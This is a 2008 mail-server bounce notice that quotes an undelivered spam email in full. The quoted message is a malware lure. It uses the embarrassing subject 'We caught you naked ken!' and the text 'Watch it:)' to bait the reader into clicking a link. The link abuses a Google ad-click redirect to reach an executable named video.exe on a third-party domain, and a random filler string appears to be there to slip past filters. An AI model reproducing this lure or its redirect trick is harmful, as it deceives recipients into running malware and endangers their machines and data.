Subject: [Gary] failure notice

From: [email-masked]
Date: 29 Apr 2008 14:04:47 +0900

Hi. This is the qmail-send program at sv333.lolipop.jp.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[email-masked]>:
124.147.39.206 failed after I sent the message.
Remote host said: 554 delivery error: dd This user doesn't have a ybb.ne.jp account ([email-masked]) [-100] - ybbmta89.mail.kcd.yahoo.co.jp

--- Below this line is a copy of the message.

From: "eddy billy" <[email-masked]>
To: <[email-masked]>
Subject: We caught you naked ken!
Date: Tue, 29 Apr 2008 03:17:22 +0000

This is a multi-part message in MIME format.

------=_NextPart_000_0003_01C8A9B6.04AEB702
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Watch it:)=20
QvbuDNxyBd
------=_NextPart_000_0003_01C8A9B6.04AEB702
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.3199" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<center><a =
href=3D"http://www.google.com/pagead/iclk?sa=3Dl&ai=3DFTsbrp&num=3D40709&=
adurl=3Dhttp://ultranano.com.tw/video.exe">Watch it:) =
<a><br><style>QvbuDNxyBd</style></center></BODY></HTML>
------=_NextPart_000_0003_01C8A9B6.04AEB702--